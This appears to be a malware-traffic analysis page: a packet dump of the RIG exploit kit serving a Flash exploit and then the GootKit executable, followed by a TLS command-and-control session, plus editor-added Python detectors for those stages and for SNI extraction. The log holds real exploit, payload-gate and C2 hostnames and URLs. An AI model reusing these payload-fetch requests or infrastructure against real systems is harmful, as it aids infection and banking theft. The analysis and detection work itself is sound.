GootKit banking trojan delivered by the RIG exploit kit (EK): traffic sample (PCAP file download)

2016-09-21 10:01:56.988869 IP 192.168.1.7.49212 > 31.184.193.179.80: Flags [P.], seq 1:282, ack 1, win 16537, length 281: HTTP: GET / HTTP/1.1
E..A._@...N..........<.P...'.iR.P.@.....GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.hairaddict.fr/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: myorderdesk.top
Connection: Keep-Alive

2016-09-21 10:01:57.203904 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], ack 282, win 123, length 0
E..(".@.8.y..........P.<.iR....@P..{L...
2016-09-21 10:01:57.204021 IP 31.184.193.179.80 > 192.168.1.7.49212: Flags [.], seq 1:1351, ack 282, win 123, length 1350: HTTP: HTTP/1.1 200 OK
E..n".@.8.tK.........P.<.iR....@P..{....HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 14:02:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4439
Connection: close
Content-Type: application/x-shockwave-flash

CWS     ....x..X.t.Wy.;..}IZ..lKv...cg.Z....Md=-[.-...@3wfvf......>p..&MCC.&!..K.B mHiB.@.=....9=X.=..-$"..!P(m..V..!i............

2016-09-21 10:02:01.948239 IP 192.168.1.7.49215 > 185.117.73.233.80: Flags [P.], seq 1118:1555, ack 27790, win 16269, length 437: HTTP: GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
E.....@...*......uI..?.P.....3..P.?.....GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: v4yw02i.c0ekkjjz.top
Connection: Keep-Alive

2016-09-21 10:02:02.152809 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], ack 1555, win 515, length 0
E..(..@.5....uI......P.?.3......P....J..
2016-09-21 10:02:04.257191 IP 185.117.73.233.80 > 192.168.1.7.49215: Flags [.], seq 27790:29140, ack 1555, win 515, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.5....uI......P.?.3......P...m...HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 21 Sep 2016 14:04:12 GMT
Content-Type: application/x-msdownload
Content-Length: 212992
Connection: keep-alive
Accept-Ranges: bytes
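
The first two transactions are the exploit and payload stages of the chain: a GET / to myorderdesk.top from a browser advertising x-flash-version 19,0,0,245, with Referer http://www.hairaddict.fr/, is answered with a 4439-byte application/x-shockwave-flash object whose body starts with CWS (a zlib-compressed SWF); about four seconds later the same client fetches index.php with a long opaque query string from v4yw02i.c0ekkjjz.top and receives a 212992-byte application/x-msdownload, the payload the page identifies as GootKit. The script below is an added example by the editor, not code from the page or from any project; it triages request/response header pairs for exactly those two stages. The header text is transcribed from the capture above, the bodies are constructed stubs (only the SWF magic is kept, the PE body is not shown on the page), and the 60-character threshold for an opaque query value is an assumption tuned to this capture, not a published RIG signature.

```python
"""Triage HTTP request/response pairs from a tcpdump -A style dump for the
two exploit-kit stages seen in this capture: a Flash object fetched by a
browser that advertises x-flash-version, and a raw Windows executable
served as the payload. Editor's example; headers transcribed from the
capture, bodies constructed."""
import re

# SWF magics: FWS = uncompressed, CWS = zlib-compressed, ZWS = LZMA-compressed.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")
PE_MAGIC = b"MZ"
# Assumed threshold: one query parameter with a 60+ character opaque value,
# as on the payload request in this capture.
OPAQUE_QUERY = re.compile(r"\?[A-Za-z0-9_]+=[A-Za-z0-9_-]{60,}")


def parse_headers(message: str) -> tuple[str, dict[str, str]]:
    """Split an HTTP message head into its start line and a dict of
    lower-cased header names to values (headers only, no body)."""
    lines = message.strip().splitlines()
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0].strip(), headers


def triage(request: str, response: str, body_prefix: bytes) -> list[str]:
    """Return indicator strings for one request/response pair. body_prefix
    is the start of the response body; pass b"" if it was not captured."""
    req_line, req = parse_headers(request)
    _, resp = parse_headers(response)
    host = req.get("host", "?")
    ctype = resp.get("content-type", "").lower()
    size = resp.get("content-length", "?")
    findings: list[str] = []

    # Stage 1: Flash object requested by a Flash-enabled browser. Either the
    # declared type or the SWF magic in the body is enough to flag it.
    is_swf = ctype == "application/x-shockwave-flash" or body_prefix[:3] in SWF_MAGICS
    if "x-flash-version" in req and is_swf:
        findings.append(f"flash object from {host} (referer {req.get('referer', 'none')}, "
                        f"flash {req['x-flash-version']}, {size} bytes)")

    # Stage 2: executable payload. The body magic is checked too, because a
    # kit may label the PE as application/octet-stream instead.
    if ctype == "application/x-msdownload" or body_prefix[:2] == PE_MAGIC:
        findings.append(f"executable download from {host} ({size} bytes)")

    # Gate-style URL: a long opaque parameter value on the request path.
    m = re.match(r"[A-Z]+\s+(\S+)", req_line)
    if m and OPAQUE_QUERY.search(m.group(1)):
        findings.append(f"long opaque query string to {host}: {m.group(1)[:40]}")
    return findings


# Constructed samples, transcribed from the headers shown in the capture.
FLASH_REQ = """GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.hairaddict.fr/
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: myorderdesk.top
Connection: Keep-Alive
"""
FLASH_RESP = """HTTP/1.1 200 OK
Date: Wed, 21 Sep 2016 14:02:36 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 4439
Connection: close
Content-Type: application/x-shockwave-flash
"""
FLASH_BODY = b"CWS"  # only the SWF magic retained from the dump

PAYLOAD_REQ = """GET /index.php?xXqKd7CeLB7MA4Y=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpDTrhSMaAtF-ZvGHLc-jVz0nOIQecggzxbT62lXxO9IQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_K-Qj53kKM&dfgsdf=298 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: v4yw02i.c0ekkjjz.top
Connection: Keep-Alive
"""
PAYLOAD_RESP = """HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Wed, 21 Sep 2016 14:04:12 GMT
Content-Type: application/x-msdownload
Content-Length: 212992
Connection: keep-alive
Accept-Ranges: bytes
"""
PAYLOAD_BODY = b""  # the dump above does not show the PE body


def run_sample() -> dict[str, list[str]]:
    """Triage both transactions from the capture, keyed by Host."""
    return {
        "myorderdesk.top": triage(FLASH_REQ, FLASH_RESP, FLASH_BODY),
        "v4yw02i.c0ekkjjz.top": triage(PAYLOAD_REQ, PAYLOAD_RESP, PAYLOAD_BODY),
    }


if __name__ == "__main__":
    for host, hits in run_sample().items():
        for hit in hits:
            print(f"{host}: {hit}")
```

Run on the two transcribed transactions it reports one flash-object hit for myorderdesk.top and two hits (executable download, opaque query) for v4yw02i.c0ekkjjz.top; the x-flash-version request header is the useful discriminator, since it is only sent when Flash is enabled and the object is being fetched by the plug-in rather than by a user click.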

2016-09-21 10:02:09.452597 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [S.], seq 1684872271, ack 3876680400, win 29200, options [mss 1350,nop,wscale 7,nop,nop,sackOK], length 0
E..4..@.-.S.xr.1.....P.Ddm.O..r...r.o......F........
2016-09-21 10:02:09.452891 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [.], ack 1, win 16537, length 0
E..(..@.........xr.1.D.P..r.dm.PP.@...........
2016-09-21 10:02:09.454382 IP 192.168.1.7.49220 > 120.114.184.49.80: Flags [P.], seq 1:124, ack 1, win 16537, length 123: HTTP
E.....@.........xr.1.D.P..r.dm.PP.@..E......v...r..W....j......$.....\...Z...(.?I.a..../.5...
.....   .
.2.8.......1..............neonbdfindcraft.win.
..............
2016-09-21 10:02:10.167283 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [.], ack 124, win 229, length 0
E..(.~@.-...xr.1.....P.Ddm.P..sKP... ...
2016-09-21 10:02:10.167352 IP 120.114.184.49.80 > 192.168.1.7.49220: Flags [P.], seq 1:1299, ack 124, win 229, length 1298: HTTP
E..:..@.-...xr.1.....P.Ddm.P..sKP....{......Y...U..W.....i.q.*.3..J{Y.....n...`...V x.J....x..x).3:&G9......u...V..j...................V...R..O..L0..H0..0.  ..._z...@0..    *.H........0f1.0        ..U....GB1.0...U....Yorks1.0...U....York1.0...U.
..MyCompany Ltd.1.0     ..U....IT1.0...U...     localhost0...160825192527Z..260823192527Z0f1.0  ..U....GB1.0...U....Yorks1.0...U....York1.0...U.
..MyCompany Ltd.1.0     ..U....IT1.0...U...     localhost0.."0..        *.H.............0..
......<.._Qm..!....%Q.K..!..o.[4.....a)S....|...X...Y:%...........c...\.l..Z'.......5........E.
.........@.v.eux........}3&>....M.(.......^c..s..x.a.......UVH...x.
...&..f<.....:.......F...,.#.....L......>8.mi..!....2....s..cF`..H....D...^e\...?L..1...'.....s.......0..       *.H.............4.......0.....-6.,...nY.?1...Jy.......)...sURl..9V(h...A..V....)%......{>...*9....).l...r...H........g.Nf...).4...V..)....6~....(.TT.Acy.>2.v.....[.I.Mk..%-...............*.K]p..w. @....#......+..\u...............V..Kx-....s..w.....m..fT...7......$/.v..8t....K...G...A...........Q6...e._...W......v......(.}.l.*S..F5.. Z:.c....W.;........S..B.!2.}..*..Q.d...........c.m=. .>...Y2..!l.35d.#..mK..R5b........0,_8..$+...0...G.<^..f.....VWN...%..'..!.-*......<{.ZP!.I..:?c. ..&,.\......s..}nM.6<...=.#....Y...;..!...r.B0x...2..H.&..!.
~.O*..!U6.k...H.....    !!..5m=~5..".+.e.....>...o.T.`\....2............
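
The third session, to 120.114.184.49:80, is labelled "HTTP" by tcpdump only because of the port: the client's 123-byte first payload is a TLS ClientHello whose server_name extension reads neonbdfindcraft.win, and the server answers with a certificate in which the same name (GB, Yorks, York, MyCompany Ltd., IT, localhost) appears as both issuer and subject, i.e. a self-signed placeholder, valid from 160825192527Z to 260823192527Z. Port-based protocol labelling misses this kind of C2 channel, so the check below classifies a TCP payload by its first bytes and pulls the SNI out of a ClientHello. This is an added example by the editor, not code from the page; build_client_hello() produces a constructed ClientHello for the name seen in this capture, since the packet bytes on the page are not recoverable verbatim, and the cipher suites and supported_groups values in it are arbitrary choices.

```python
"""Tell TLS from HTTP on a TCP payload by content rather than port, and
extract the server_name from a ClientHello. Editor's example; the
ClientHello is constructed here so the parser runs stand-alone."""
import os
import struct
from typing import Optional

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ", b"DELETE ")


def classify_payload(payload: bytes) -> str:
    """0x16 0x03 at offset 0 is a TLS handshake record; an HTTP method word
    is HTTP; anything else is reported as 'other'."""
    if payload[:2] == b"\x16\x03":
        return "tls"
    if payload.startswith(HTTP_METHODS):
        return "http"
    return "other"


def build_client_hello(server_name: str) -> bytes:
    """Constructed TLS 1.2 ClientHello: supported_groups first, then
    server_name, so the parser has to skip one extension to find SNI."""
    name = server_name.encode("ascii")
    entry = b"\x00" + struct.pack("!H", len(name)) + name          # name_type host_name
    sni_ext = struct.pack("!HH", 0x0000, len(entry) + 2) + struct.pack("!H", len(entry)) + entry
    groups_ext = b"\x00\x0a\x00\x04\x00\x02\x00\x17"                # arbitrary: secp256r1
    exts = groups_ext + sni_ext
    suites = b"\xc0\x2f\xc0\x2b\x00\x9c"                            # arbitrary suites
    body = (b"\x03\x03" + os.urandom(32) + b"\x00"                  # version, random, empty session id
            + struct.pack("!H", len(suites)) + suites
            + b"\x01\x00"                                           # one compression method: null
            + struct.pack("!H", len(exts)) + exts)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # type client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def extract_sni(payload: bytes) -> Optional[str]:
    """Return the host_name from a ClientHello's server_name extension, or
    None when the payload is not a ClientHello, is truncated, or has no SNI."""
    try:
        if payload[0] != 0x16 or payload[5] != 0x01:
            return None
        record_end = 5 + int.from_bytes(payload[3:5], "big")
        p = 9 + 2 + 32                                     # skip client_version + random
        p += 1 + payload[p]                                # session id
        p += 2 + int.from_bytes(payload[p:p + 2], "big")   # cipher suites
        p += 1 + payload[p]                                # compression methods
        if p + 2 > record_end:
            return None                                    # no extensions block at all
        ext_end = p + 2 + int.from_bytes(payload[p:p + 2], "big")
        p += 2
        while p + 4 <= ext_end:
            etype, elen = struct.unpack("!HH", payload[p:p + 4])
            p += 4
            if etype != 0x0000:                            # not server_name: skip it
                p += elen
                continue
            q = p + 2                                      # skip server_name_list length
            while q + 3 <= p + elen:
                ntype = payload[q]
                nlen = int.from_bytes(payload[q + 1:q + 3], "big")
                q += 3
                if ntype == 0 and q + nlen <= p + elen:
                    return payload[q:q + nlen].decode("ascii")
                q += nlen
            return None
    except (IndexError, struct.error, UnicodeDecodeError):
        return None                                        # truncated or malformed
    return None


if __name__ == "__main__":
    hello = build_client_hello("neonbdfindcraft.win")
    print(classify_payload(hello), extract_sni(hello))
```

The parser walks the fixed ClientHello layout (version, random, session id, cipher suites, compression methods) before the extension list and refuses truncated input rather than guessing, which matters for the first segment of a session that may be cut at a 1350-byte MSS as in this capture; the SNI it recovers is the indicator to pivot on, since neither the port nor the certificate subject carries anything searchable.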